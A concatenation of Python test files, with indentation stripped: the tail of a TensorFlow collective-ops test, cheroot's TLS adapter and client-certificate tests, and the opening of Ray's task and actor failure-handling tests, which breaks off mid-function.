op.control_inputs and
op.control_inputs[0].type.startswith('Collective')):
self.assertIsNone(third)
third = op
self.assertIsNotNone(third)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in third.inputs))
first = third.control_inputs[0]
self.assertEqual(third.device, first.device)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in first.inputs))
self.assertEmpty(first.control_inputs)
class InputPipelineTest(test.TestCase):
def setUp(self):
super().setUp()
_setup_context()
def testMap(self):
group_size = 2
group_key = 100
instance_key = 100
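# Each logical CPU device builds its own dataset and runs the all-reduce
# inside dataset.map; with inputs [1.] and [2.] both devices should fetch
# the reduced value [3.].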
def create_dataset_and_fetch_one(t):
dataset = dataset_ops.Dataset.from_tensor_slices([t])
def reduce_fn(t):
return CollectiveOpsV2.all_reduce(
t,
group_size=group_size,
group_key=group_key,
instance_key=instance_key)
dataset = dataset.map(reduce_fn)
return next(iter(dataset))
@def_function.function
def f():
with ops.device('CPU:0'):
value0 = create_dataset_and_fetch_one([1.])
with ops.device('CPU:1'):
value1 = create_dataset_and_fetch_one([2.])
return value0, value1
self.assertAllEqual(self.evaluate(f()), [[3.], [3.]])
def _setup_context():
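# Reset the eager context and make sure at least four logical CPU devices
# exist so that multi-device collectives can run on a single host.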
context._reset_context()
test_util.set_logical_devices_to_at_least('CPU', 4)
context.ensure_initialized()
if __name__ == '__main__':
os.environ['NCCL_DEBUG'] = 'INFO'
v2_compat.enable_v2_behavior()
test.main()
|
test_ssl.py
|
"""Tests for TLS support."""
# -*- coding: utf-8 -*-
# vim: set fileencoding=utf-8 :
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import functools
import json
import os
import ssl
import subprocess
import sys
import threading
import time
import OpenSSL.SSL
import pytest
import requests
import six
import trustme
from .._compat import bton, ntob, ntou
from .._compat import IS_ABOVE_OPENSSL10, IS_PYPY
from .._compat import IS_LINUX, IS_MACOS, IS_WINDOWS
from ..server import HTTPServer, get_ssl_adapter_class
from ..testing import (
ANY_INTERFACE_IPV4,
ANY_INTERFACE_IPV6,
EPHEMERAL_PORT,
# get_server_client,
_get_conn_data,
_probe_ipv6_sock,
)
from ..wsgi import Gateway_10
IS_GITHUB_ACTIONS_WORKFLOW = bool(os.getenv('GITHUB_WORKFLOW'))
IS_WIN2016 = (
IS_WINDOWS
# pylint: disable=unsupported-membership-test
and b'Microsoft Windows Server 2016 Datacenter' in subprocess.check_output(
('systeminfo', ),
)
)
IS_LIBRESSL_BACKEND = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_PYOPENSSL_SSL_VERSION_1_0 = (
OpenSSL.SSL.SSLeay_version(OpenSSL.SSL.SSLEAY_VERSION).
startswith(b'OpenSSL 1.0.')
)
PY27 = sys.version_info[:2] == (2, 7)
PY34 = sys.version_info[:2] == (3, 4)
PY3 = not six.PY2
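# Map stdlib ssl verification constants onto their pyOpenSSL counterparts.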
_stdlib_to_openssl_verify = {
ssl.CERT_NONE: OpenSSL.SSL.VERIFY_NONE,
ssl.CERT_OPTIONAL: OpenSSL.SSL.VERIFY_PEER,
ssl.CERT_REQUIRED:
OpenSSL.SSL.VERIFY_PEER + OpenSSL.SSL.VERIFY_FAIL_IF_NO_PEER_CERT,
}
fails_under_py3 = pytest.mark.xfail(
not six.PY2,
reason='Fails under Python 3+',
)
fails_under_py3_in_pypy = pytest.mark.xfail(
not six.PY2 and IS_PYPY,
reason='Fails under PyPy3',
)
missing_ipv6 = pytest.mark.skipif(
not _probe_ipv6_sock('::1'),
reason=''
'IPv6 is disabled '
'(for example, under Travis CI '
'which runs under GCE supporting only IPv4)',
)
class HelloWorldGateway(Gateway_10):
"""Gateway responding with Hello World to root URI."""
def respond(self):
"""Respond with dummy content via HTTP."""
req = self.req
req_uri = bton(req.uri)
if req_uri == '/':
req.status = b'200 OK'
req.ensure_headers_sent()
req.write(b'Hello world!')
return
if req_uri == '/env':
req.status = b'200 OK'
req.ensure_headers_sent()
env = self.get_environ()
# drop the file-like objects so that the environ can be JSON-dumped
env.pop('wsgi.errors')
env.pop('wsgi.input')
print(env)
req.write(json.dumps(env).encode('utf-8'))
return
return super(HelloWorldGateway, self).respond()
def make_tls_http_server(bind_addr, ssl_adapter, request):
"""Create and start an HTTP server bound to ``bind_addr``."""
httpserver = HTTPServer(
bind_addr=bind_addr,
gateway=HelloWorldGateway,
)
# httpserver.gateway = HelloWorldGateway
httpserver.ssl_adapter = ssl_adapter
threading.Thread(target=httpserver.safe_start).start()
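# Wait for the server thread to finish starting before handing the server
# back to the test; stop() is registered as a finalizer below.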
while not httpserver.ready:
time.sleep(0.1)
request.addfinalizer(httpserver.stop)
return httpserver
@pytest.fixture
def tls_http_server(request):
"""Provision a server creator as a fixture."""
return functools.partial(make_tls_http_server, request=request)
@pytest.fixture
def ca():
"""Provide a certificate authority via fixture."""
return trustme.CA()
@pytest.fixture
def tls_ca_certificate_pem_path(ca):
"""Provide a certificate authority certificate file via fixture."""
with ca.cert_pem.tempfile() as ca_cert_pem:
yield ca_cert_pem
@pytest.fixture
def tls_certificate(ca):
"""Provide a leaf certificate via fixture."""
interface, host, port = _get_conn_data(ANY_INTERFACE_IPV4)
return ca.issue_server_cert(ntou(interface), )
@pytest.fixture
def tls_certificate_chain_pem_path(tls_certificate):
"""Provide a certificate chain PEM file path via fixture."""
with tls_certificate.private_key_and_cert_chain_pem.tempfile() as cert_pem:
yield cert_pem
@pytest.fixture
def tls_certificate_private_key_pem_path(tls_certificate):
"""Provide a certificate private key PEM file path via fixture."""
with tls_certificate.private_key_pem.tempfile() as cert_key_pem:
yield cert_key_pem
@pytest.mark.parametrize(
'adapter_type',
(
'builtin',
'pyopenssl',
),
)
def test_ssl_adapters(
tls_http_server, adapter_type,
tls_certificate,
tls_certificate_chain_pem_path,
tls_certificate_private_key_pem_path,
tls_ca_certificate_pem_path,
):
"""Test ability to connect to server via HTTPS using adapters."""
interface, _host, port = _get_conn_data(ANY_INTERFACE_IPV4)
tls_adapter_cls = get_ssl_adapter_class(name=adapter_type)
tls_adapter = tls_adapter_cls(
tls_certificate_chain_pem_path, tls_certificate_private_key_pem_path,
)
if adapter_type == 'pyopenssl':
tls_adapter.context = tls_adapter.get_context()
tls_certificate.configure_cert(tls_adapter.context)
tlshttpserver = tls_http_server((interface, port), tls_adapter)
# testclient = get_server_client(tlshttpserver)
# testclient.get('/')
interface, _host, port = _get_conn_data(
tlshttpserver.bind_addr,
)
resp = requests.get(
'https://{host!s}:{port!s}/'.format(host=interface, port=port),
verify=tls_ca_certificate_pem_path,
)
assert resp.status_code == 200
assert resp.text == 'Hello world!'
@pytest.mark.parametrize(
'adapter_type',
(
'builtin',
'pyopenssl',
),
)
@pytest.mark.parametrize(
('is_trusted_cert', 'tls_client_identity'),
(
(True, 'localhost'), (True, '127.0.0.1'),
(True, '*.localhost'), (True, 'not_localhost'),
(False, 'localhost'),
),
)
@pytest.mark.parametrize(
'tls_verify_mode',
(
ssl.CERT_NONE, # server shouldn't validate client cert
ssl.CERT_OPTIONAL, # same as CERT_REQUIRED in client mode, don't use
ssl.CERT_REQUIRED, # server should validate if client cert CA is OK
),
)
def test_tls_client_auth(
# FIXME: remove twisted logic, separate tests
mocker,
tls_http_server, adapter_type,
ca,
tls_certificate,
tls_certificate_chain_pem_path,
tls_certificate_private_key_pem_path,
tls_ca_certificate_pem_path,
is_trusted_cert, tls_client_identity,
tls_verify_mode,
):
"""Verify that client TLS certificate auth works correctly."""
test_cert_rejection = (
tls_verify_mode != ssl.CERT_NONE
and not is_trusted_cert
)
interface, _host, port = _get_conn_data(ANY_INTERFACE_IPV4)
client_cert_root_ca = ca if is_trusted_cert else trustme.CA()
with mocker.mock_module.patch(
'idna.core.ulabel',
return_value=ntob(tls_client_identity),
):
client_cert = client_cert_root_ca.issue_server_cert(
# FIXME: change to issue_cert once new trustme is out
ntou(tls_client_identity),
)
del client_cert_root_ca
with client_cert.private_key_and_cert_chain_pem.tempfile() as cl_pem:
tls_adapter_cls = get_ssl_adapter_class(name=adapter_type)
tls_adapter = tls_adapter_cls(
tls_certificate_chain_pem_path,
tls_certificate_private_key_pem_path,
)
if adapter_type == 'pyopenssl':
tls_adapter.context = tls_adapter.get_context()
tls_adapter.context.set_verify(
_stdlib_to_openssl_verify[tls_verify_mode],
lambda conn, cert, errno, depth, preverify_ok: preverify_ok,
)
else:
tls_adapter.context.verify_mode = tls_verify_mode
ca.configure_trust(tls_adapter.context)
tls_certificate.configure_cert(tls_adapter.context)
tlshttpserver = tls_http_server((interface, port), tls_adapter)
interface, _host, port = _get_conn_data(tlshttpserver.bind_addr)
make_https_request = functools.partial(
requests.get,
'https://{host!s}:{port!s}/'.format(host=interface, port=port),
# Server TLS certificate verification:
verify=tls_ca_certificate_pem_path,
# Client TLS certificate verification:
cert=cl_pem,
)
if not test_cert_rejection:
resp = make_https_request()
is_req_successful = resp.status_code == 200
if (
not is_req_successful
and IS_PYOPENSSL_SSL_VERSION_1_0
and adapter_type == 'builtin'
and tls_verify_mode == ssl.CERT_REQUIRED
and tls_client_identity == 'localhost'
and is_trusted_cert
) or PY34:
pytest.xfail(
'OpenSSL 1.0 has problems with verifying client certs',
)
assert is_req_successful
assert resp.text == 'Hello world!'
return
# xfail some flaky tests
# https://github.com/cherrypy/cheroot/issues/237
issue_237 = (
IS_MACOS
and adapter_type == 'builtin'
and tls_verify_mode != ssl.CERT_NONE
)
if issue_237:
pytest.xfail('Test sometimes fails')
expected_ssl_errors = (
requests.exceptions.SSLError,
OpenSSL.SSL.Error,
) if PY34 else (
requests.exceptions.SSLError,
)
if IS_WINDOWS or IS_GITHUB_ACTIONS_WORKFLOW:
expected_ssl_errors += requests.exceptions.ConnectionError,
with pytest.raises(expected_ssl_errors) as ssl_err:
make_https_request()
if PY34 and isinstance(ssl_err.value, OpenSSL.SSL.Error):
pytest.xfail(
'OpenSSL behaves weirdly under Python 3.4 '
'because of an outdated urllib3',
)
try:
err_text = ssl_err.value.args[0].reason.args[0].args[0]
except AttributeError:
if PY34:
pytest.xfail('OpenSSL behaves weirdly under Python 3.4')
elif not six.PY2 and IS_WINDOWS or IS_GITHUB_ACTIONS_WORKFLOW:
err_text = str(ssl_err.value)
else:
raise
expected_substrings = (
'sslv3 alert bad certificate' if IS_LIBRESSL_BACKEND
else 'tlsv1 alert unknown ca',
)
if not six.PY2:
if IS_MACOS and IS_PYPY and adapter_type == 'pyopenssl':
expected_substrings = ('tlsv1 alert unknown ca', )
if (
tls_verify_mode in (
ssl.CERT_REQUIRED,
ssl.CERT_OPTIONAL,
)
and not is_trusted_cert
and tls_client_identity == 'localhost'
):
expected_substrings += (
'bad handshake: '
"SysCallError(10054, 'WSAECONNRESET')",
"('Connection aborted.', "
'OSError("(10054, \'WSAECONNRESET\')"))',
"('Connection aborted.', "
'OSError("(10054, \'WSAECONNRESET\')",))',
"('Connection aborted.', "
'error("(10054, \'WSAECONNRESET\')",))',
) if IS_WINDOWS else (
"('Connection aborted.', "
'OSError("(104, \'ECONNRESET\')"))',
"('Connection aborted.', "
'OSError("(104, \'ECONNRESET\')",))',
"('Connection aborted.', "
'error("(104, \'ECONNRESET\')",))',
) if (
IS_GITHUB_ACTIONS_WORKFLOW
and IS_LINUX
) else ()
assert any(e in err_text for e in expected_substrings)
@pytest.mark.parametrize(
'adapter_type',
(
'builtin',
'pyopenssl',
),
)
@pytest.mark.parametrize(
('tls_verify_mode', 'use_client_cert'),
(
(ssl.CERT_NONE, False),
(ssl.CERT_NONE, True),
(ssl.CERT_OPTIONAL, False),
(ssl.CERT_OPTIONAL, True),
(ssl.CERT_REQUIRED, True),
),
)
def test_ssl_env(
mocker,
tls_http_server, adapter_type,
ca, tls_verify_mode, tls_certificate,
tls_certificate_chain_pem_path,
tls_certificate_private_key_pem_path,
tls_ca_certificate_pem_path,
use_client_cert,
):
"""Test the SSL environment generated by the SSL adapters."""
interface, _host, port = _get_conn_data(ANY_INTERFACE_IPV4)
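# Patching idna.core.ulabel appears to work around idna rejecting bare IP
# addresses, so trustme can issue a client certificate for 127.0.0.1.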
with mocker.mock_module.patch(
'idna.core.ulabel',
return_value=ntob('127.0.0.1'),
):
client_cert = ca.issue_cert(ntou('127.0.0.1'),)
with client_cert.private_key_and_cert_chain_pem.tempfile() as cl_pem:
tls_adapter_cls = get_ssl_adapter_class(name=adapter_type)
tls_adapter = tls_adapter_cls(
tls_certificate_chain_pem_path,
tls_certificate_private_key_pem_path,
)
if adapter_type == 'pyopenssl':
tls_adapter.context = tls_adapter.get_context()
tls_adapter.context.set_verify(
_stdlib_to_openssl_verify[tls_verify_mode],
lambda conn, cert, errno, depth, preverify_ok: preverify_ok,
)
else:
tls_adapter.context.verify_mode = tls_verify_mode
ca.configure_trust(tls_adapter.context)
tls_certificate.configure_cert(tls_adapter.context)
tlswsgiserver = tls_http_server((interface, port), tls_adapter)
interface, _host, port = _get_conn_data(tlswsgiserver.bind_addr)
resp = requests.get(
'https://' + interface + ':' + str(port) + '/env',
verify=tls_ca_certificate_pem_path,
cert=cl_pem if use_client_cert else None,
)
if PY34 and resp.status_code != 200:
pytest.xfail(
'Python 3.4 has problems with verifying client certs',
)
env = json.loads(resp.content.decode('utf-8'))
# hard coded env
assert env['wsgi.url_scheme'] == 'https'
assert env['HTTPS'] == 'on'
# ensure these are present
for key in {'SSL_VERSION_INTERFACE', 'SSL_VERSION_LIBRARY'}:
assert key in env
# pyOpenSSL generates the env before the handshake completes
if adapter_type == 'pyopenssl':
return
for key in {'SSL_PROTOCOL', 'SSL_CIPHER'}:
assert key in env
# client certificate env
if tls_verify_mode == ssl.CERT_NONE or not use_client_cert:
assert env['SSL_CLIENT_VERIFY'] == 'NONE'
else:
assert env['SSL_CLIENT_VERIFY'] == 'SUCCESS'
with open(cl_pem, 'rt') as f:
assert env['SSL_CLIENT_CERT'] in f.read()
for key in {
'SSL_CLIENT_M_VERSION', 'SSL_CLIENT_M_SERIAL',
'SSL_CLIENT_I_DN', 'SSL_CLIENT_S_DN',
}:
assert key in env
@pytest.mark.parametrize(
'ip_addr',
(
ANY_INTERFACE_IPV4,
ANY_INTERFACE_IPV6,
),
)
def test_https_over_http_error(http_server, ip_addr):
"""Ensure that connecting over HTTPS to HTTP port is handled."""
httpserver = http_server.send((ip_addr, EPHEMERAL_PORT))
interface, _host, port = _get_conn_data(httpserver.bind_addr)
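# Speaking TLS to a plain-HTTP port should fail during the handshake with a
# protocol/version error from the ssl module.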
with pytest.raises(ssl.SSLError) as ssl_err:
six.moves.http_client.HTTPSConnection(
'{interface}:{port}'.format(
interface=interface,
port=port,
),
).request('GET', '/')
expected_substring = (
'wrong version number' if IS_ABOVE_OPENSSL10
else 'unknown protocol'
)
assert expected_substring in ssl_err.value.args[-1]
@pytest.mark.parametrize(
'adapter_type',
(
'builtin',
'pyopenssl',
),
)
@pytest.mark.parametrize(
'ip_addr',
(
ANY_INTERFACE_IPV4,
pytest.param(ANY_INTERFACE_IPV6, marks=missing_ipv6),
),
)
def test_http_over_https_error(
tls_http_server, adapter_type,
ca, ip_addr,
tls_certificate,
tls_certificate_chain_pem_path,
tls_certificate_private_key_pem_path,
):
"""Ensure that connecting over HTTP to HTTPS port is handled."""
# disable some flaky tests
# https://github.com/cherrypy/cheroot/issues/225
issue_225 = (
IS_MACOS
and adapter_type == 'builtin'
)
if issue_225:
pytest.xfail('Test fails in Travis-CI')
tls_adapter_cls = get_ssl_adapter_class(name=adapter_type)
tls_adapter = tls_adapter_cls(
tls_certificate_chain_pem_path, tls_certificate_private_key_pem_path,
)
if adapter_type == 'pyopenssl':
tls_adapter.context = tls_adapter.get_context()
tls_certificate.configure_cert(tls_adapter.context)
interface, _host, port = _get_conn_data(ip_addr)
tlshttpserver = tls_http_server((interface, port), tls_adapter)
interface, host, port = _get_conn_data(
tlshttpserver.bind_addr,
)
fqdn = interface
if ip_addr is ANY_INTERFACE_IPV6:
fqdn = '[{}]'.format(fqdn)
expect_fallback_response_over_plain_http = (
(adapter_type == 'pyopenssl'
and (IS_ABOVE_OPENSSL10 or not six.PY2))
or PY27
) or (
IS_GITHUB_ACTIONS_WORKFLOW
and IS_WINDOWS
and six.PY2
and not IS_WIN2016
)
if (
IS_GITHUB_ACTIONS_WORKFLOW
and IS_WINDOWS
and six.PY2
and IS_WIN2016
and adapter_type == 'builtin'
and ip_addr is ANY_INTERFACE_IPV6
):
expect_fallback_response_over_plain_http = True
if (
IS_GITHUB_ACTIONS_WORKFLOW
and IS_WINDOWS
and six.PY2
and not IS_WIN2016
and adapter_type == 'builtin'
and ip_addr is not ANY_INTERFACE_IPV6
):
expect_fallback_response_over_plain_http = False
if expect_fallback_response_over_plain_http:
resp = requests.get(
'http://{host!s}:{port!s}/'.format(host=fqdn, port=port),
)
assert resp.status_code == 400
assert resp.text == (
'The client sent a plain HTTP request, '
'but this server only speaks HTTPS on this port.'
)
return
with pytest.raises(requests.exceptions.ConnectionError) as ssl_err:
requests.get( # FIXME: make stdlib ssl behave like PyOpenSSL
'http://{host!s}:{port!s}/'.format(host=fqdn, port=port),
)
if IS_LINUX:
expected_error_code, expected_error_text = (
104, 'Connection reset by peer',
)
if IS_MACOS:
expected_error_code, expected_error_text = (
54, 'Connection reset by peer',
)
if IS_WINDOWS:
expected_error_code, expected_error_text = (
10054,
'An existing connection was forcibly closed by the remote host',
)
underlying_error = ssl_err.value.args[0].args[-1]
err_text = str(underlying_error)
assert underlying_error.errno == expected_error_code, (
'The underlying error is {!r}'.
format(underlying_error)
)
assert expected_error_text in err_text
|
test_failure.py
|
import json
import logging
import os
import signal
import sys
import tempfile
import threading
import time
import numpy as np
import pytest
import redis
import ray
import ray.utils
import ray.ray_constants as ray_constants
from ray.exceptions import RayTaskError
from ray.cluster_utils import Cluster
from ray.test_utils import (
wait_for_condition,
SignalActor,
init_error_pubsub,
get_error_message,
Semaphore,
new_scheduler_enabled,
)
def test_failed_task(ray_start_regular, error_pubsub):
@ray.remote
def throw_exception_fct1():
raise Exception("Test function 1 intentionally failed.")
@ray.remote
def throw_exception_fct2():
raise Exception("Test function 2 intentionally failed.")
@ray.remote(num_returns=3)
def throw_exception_fct3(x):
raise Exception("Test function 3 intentionally failed.")
p = error_pubsub
throw_exception_fct1.remote()
throw_exception_fct1.remote()
msgs = get_error_message(p, 2, ray_constants.TASK_PUSH_ERROR)
assert len(msgs) == 2
for msg in msgs:
assert "Test function 1 intentionally failed." in msg.error_message
x = throw_exception_fct2.remote()
try:
ray.get(x)
except Exception as e:
assert "Test function 2 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
x, y, z = throw_exception_fct3.remote(1.0)
for ref in [x, y, z]:
try:
ray.get(ref)
except Exception as e:
assert "Test function 3 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
class CustomException(ValueError):
pass
@ray.remote
def f():
raise CustomException("This function failed.")
try:
ray.get(f.remote())
except Exception as e:
assert "This function failed." in str(e)
assert isinstance(e, CustomException)
assert isinstance(e, ray.exceptions.RayTaskError)
assert "RayTaskError(CustomException)" in repr(e)
else:
# ray.get should throw an exception.
assert False
def test_push_error_to_driver_through_redis(ray_start_regular, error_pubsub):
address_info = ray_start_regular
address = address_info["redis_address"]
redis_client = ray._private.services.create_redis_client(
address, password=ray.ray_constants.REDIS_DEFAULT_PASSWORD)
error_message = "Test error message"
ray.utils.push_error_to_driver_through_redis(
redis_client, ray_constants.DASHBOARD_AGENT_DIED_ERROR, error_message)
errors = get_error_message(error_pubsub, 1,
ray_constants.DASHBOARD_AGENT_DIED_ERROR)
assert errors[0].type == ray_constants.DASHBOARD_AGENT_DIED_ERROR
assert errors[0].error_message == error_message
def test_get_throws_quickly_when_found_exception(ray_start_regular):
# We use an actor instead of functions here. If we use functions, it's
# very likely that two normal tasks are submitted before the first worker
# is registered to Raylet. Since `maximum_startup_concurrency` is 1,
# the worker pool will wait for the registration of the first worker
# and skip starting new workers. As a result, the two tasks would be
# executed sequentially, which breaks an assumption of this test case:
# that the two tasks run in parallel.
@ray.remote
class Actor(object):
def bad_func1(self):
raise Exception("Test function intentionally failed.")
def bad_func2(self):
os._exit(0)
def slow_func(self, signal):
ray.get(signal.wait.remote())
def expect_exception(objects, exception):
with pytest.raises(ray.exceptions.RayError) as err:
ray.get(objects)
assert err.type is exception
signal1 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func1.remote(),
actor.slow_func.remote(signal1)], ray.exceptions.RayTaskError)
ray.get(signal1.send.remote())
signal2 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func2.remote(),
actor.slow_func.remote(signal2)], ray.exceptions.RayActorError)
ray.get(signal2.send.remote())
def test_fail_importing_remote_function(ray_start_2_cpus, error_pubsub):
p = error_pubsub
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define a function that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def g(x, y=3):
try:
module.temporary_python_file()
except Exception:
# This test is not concerned with the error from running this
# function, only with the error from unpickling the remote function.
pass
# Invoke the function so that the definition is exported.
g.remote(1, y=2)
errors = get_error_message(
p, 2, ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
assert errors[0].type == ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR
assert "No module named" in errors[0].error_message
assert "No module named" in errors[1].error_message
# Check that if we try to call the function it throws an exception and
# does not hang.
for _ in range(10):
with pytest.raises(
Exception, match="This function was not imported properly."):
ray.get(g.remote(1, y=2))
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_function_to_run(ray_start_2_cpus, error_pubsub):
p = error_pubsub
def f(worker):
if ray.worker.global_worker.mode == ray.WORKER_MODE:
raise Exception("Function to run failed.")
ray.worker.global_worker.run_function_on_all_workers(f)
# Check that the error message is in the task info.
errors = get_error_message(p, 2, ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
assert len(errors) == 2
assert errors[0].type == ray_constants.FUNCTION_TO_RUN_PUSH_ERROR
assert "Function to run failed." in errors[0].error_message
assert "Function to run failed." in errors[1].error_message
def test_fail_importing_actor(ray_start_regular, error_pubsub):
p = error_pubsub
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo:
def __init__(self, arg1, arg2=3):
self.x = module.temporary_python_file()
def get_val(self, arg1, arg2=3):
return 1
# There should be no errors yet.
errors = get_error_message(p, 2)
assert len(errors) == 0
# Create an actor.
foo = Foo.remote(3, arg2=0)
errors = get_error_message(p, 2)
assert len(errors) == 2
for error in errors:
# Wait for the error to arrive.
if error.type == ray_constants.REGISTER_ACTOR_PUSH_ERROR:
assert "No module named" in error.error_message
else:
# Wait for the error raised when __init__ tries to run.
assert ("failed to be imported, and so cannot execute this method"
in error.error_message)
# Check that if we try to get the function it throws an exception and
# does not hang.
with pytest.raises(Exception, match="failed to be imported"):
ray.get(foo.get_val.remote(1, arg2=2))
# Wait for the error from the call to get_val.
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert ("failed to be imported, and so cannot execute this method" in
errors[0].error_message)
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular, error_pubsub):
p = error_pubsub
error_message1 = "actor constructor failed"
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
raise Exception(error_message1)
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed constructor.
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message1 in errors[0].error_message
# Make sure that we get errors from a failed method.
a.fail_method.remote()
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message1 in errors[0].error_message
def test_failed_actor_method(ray_start_regular, error_pubsub):
p = error_pubsub
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
pass
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed method.
a.fail_method.remote()
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message2 in errors[0].error_message
def test_incorrect_method_calls(ray_start_regular):
@ray.remote
class Actor:
def __init__(self, missing_variable_name):
pass
def get_val(self, x):
pass
# Make sure that we get errors if we call the constructor incorrectly.
# Create an actor with too few arguments.
with pytest.raises(Exception):
a = Actor.remote()
# Create an actor with too many arguments.
with pytest.raises(Exception):
a = Actor.remote(1, 2)
# Create an actor with the correct number of arguments.
a = Actor.remote(1)
# Call a method with too few arguments.
with pytest.raises(Exception):
a.get_val.remote()
# Call a method with too many arguments.
with pytest.raises(Exception):
a.get_val.remote(1, 2)
# Call a method that doesn't exist.
with pytest.raises(AttributeError):
a.nonexistent_method()
with pytest.raises(AttributeError):
a.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote(max_calls=2)
def f():
# This is the only reasonable variable we can set here that makes the
# execute_task function fail after the task got executed.
worker = ray.worker.global_worker
worker.function_actor_manager.increase_task_counter = None
# Running this task should cause the worker to raise an exception after
# the task has successfully completed.
f.remote()
errors = get_error_message(p, 1, ray_constants.WORKER_CRASH_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_CRASH_PUSH_ERROR
def test_worker_dying(ray_start_regular, error_pubsub):
p = error_pubsub
# Define a remote function that will kill the worker that runs it.
@ray.remote(max_retries=0)
def f():
eval("exit()")
with pytest.raises(ray.exceptions.WorkerCrashedError):
ray.get(f.remote())
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
assert "died or was killed while executing" in errors[0].error_message
def test_actor_worker_dying(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote
class Actor:
def kill(self):
eval("exit()")
@ray.remote
def consume(x):
pass
a = Actor.remote()
[obj], _ = ray.wait([a.kill.remote()], timeout=5)
with pytest.raises(ray.exceptions.RayActorError):
ray.get(obj)
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(consume.remote(obj))
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_future_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
def sleep(self):
time.sleep(1)
a = Actor.remote()
pid = ray.get(a.getpid.remote())
tasks1 = [a.sleep.remote() for _ in range(10)]
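# SIGKILL the actor process; both the in-flight tasks and the tasks
# submitted afterwards should fail.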
os.kill(pid, 9)
time.sleep(0.1)
tasks2 = [a.sleep.remote() for _ in range(10)]
for obj in tasks1 + tasks2:
with pytest.raises(Exception):
ray.get(obj)
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
a = Actor.remote()
pid = ray.get(a.getpid.remote())
os.kill(pid, 9)
time.sleep(0.1)
task2 = a.getpid.remote()
with pytest.raises(Exception):
ray.get(task2)
def test_actor_scope_or_intentionally_killed_message(ray_start_regular,
error_pubsub):
p = error_pubsub
@ray.remote
class Actor:
def __init__(self):
# This log is added to debug a flaky test issue.
print(os.getpid())
def ping(self):
pass
a = Actor.remote()
# Without this wait, there seems to be a race condition in the CI. This is
# not a fundamental fix for that, but it at least makes the test less
# flaky.
ray.get(a.ping.remote())
a = Actor.remote()
a.__ray_terminate__.remote()
time.sleep(1)
errors = get_error_message(p, 1)
assert len(errors) == 0, "Should not have propagated an error - {}".format(
errors)
def test_exception_chain(ray_start_regular):
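# A ZeroDivisionError raised inside bar() should propagate through foo() as
# a RayTaskError that still matches the original exception type.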
@ray.remote
def bar():
return 1 / 0
@ray.remote
def foo():
return ray.get(bar.remote())
r = foo.remote()
try:
ray.get(r)
except ZeroDivisionError as ex:
assert isinstance(ex, RayTaskError)
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error1(ray_start_object_store_memory, error_pubsub):
p = error_pubsub
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_arg_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = single_dependency.remote(0, np.zeros(
object_size, dtype=np.uint8))
